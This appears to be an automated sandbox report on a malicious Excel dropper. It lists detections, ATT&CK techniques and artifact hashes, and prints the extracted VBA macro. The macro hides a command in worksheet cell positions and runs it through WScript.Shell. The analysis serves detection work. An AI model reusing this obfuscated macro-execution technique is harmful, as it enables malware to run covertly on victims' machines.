Verdict: MALICIOUS
Risk Score: 240
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1203 Exploitation for Client Execution
The sample is an Excel document containing VBA macros that use WScript.Shell to execute a command. The macro builds the command string by concatenating characters derived from worksheet cell values (the command itself never appears literally in the script), then executes the result. This behavior is indicative of a dropper that downloads and executes a second-stage payload, as suggested by the ClamAV detection name 'Xls.Dropper.Agent-8810704-0'. The use of WScript.Shell and the execution of an arbitrary command are the key indicators.
Heuristics (4)
- ClamAV: Xls.Dropper.Agent-8810704-0 | severity: critical | CLAMAV_DETECTION: ClamAV detected this file as malware: Xls.Dropper.Agent-8810704-0
- VBA project inside OOXML | severity: medium | 2 related findings | OOXML_VBA: document contains a VBA project (VBA macros present)
- WScript.Shell usage | severity: critical | OLE_VBA_WSCRIPT: WScript.Shell usage. Matched line in script:
  On Error Resume Next Print Err.Number & " " & Wscript.echo.Quit:: CreateObject("Wscript.Shell").exec(fig).ExitCode , vbCritical, "", 0 ActiveWorkbook.Close False
- CreateObject call | severity: high | OLE_VBA_CREATEOBJ: CreateObject call. Matched line in script:
  On Error Resume Next Print Err.Number & " " & Wscript.echo.Quit:: CreateObject("Wscript.Shell").exec(fig).ExitCode , vbCritical, "", 0 ActiveWorkbook.Close False
Extracted artifacts (3)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1058 bytes | 4d85480660effb9e19d036c20741c00162241852d175c48484056d348568aafa |
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 10752 bytes | e3e17661a75445ffd10c6364258e1bbcd96fac6ebdc46c5199b7ca1c0cc54a82 |
| emf_00.emf | ooxml-emf | OOXML EMF part: xl/media/image1.emf | 2024 bytes | 18442f66fc184308368fb113b1c28494dce7331a052469405fcf94f2ee8085b5 |

Detection for vbaProject_00.bin: ClamAV: Xls.Dropper.Agent-8810704-0. Obfuscation or payload: unlikely.

Preview script (macros.bas): first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "A, 1, 0, MSForms, Frame"
Private Sub A_Layout()
Dim c(2398)
For Each Ee In ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants)
c(Ee.value) = Chr(Ee.Row)
Next
For Each k In c
fig = fig + k
Next
On Error Resume Next
Print Err.Number & " " & Wscript.echo.Quit:: CreateObject("Wscript.Shell").exec(fig).ExitCode , vbCritical, "", 0
ActiveWorkbook.Close False
End Sub
Sub lets()
MsgBox "": h = 12
End Sub
```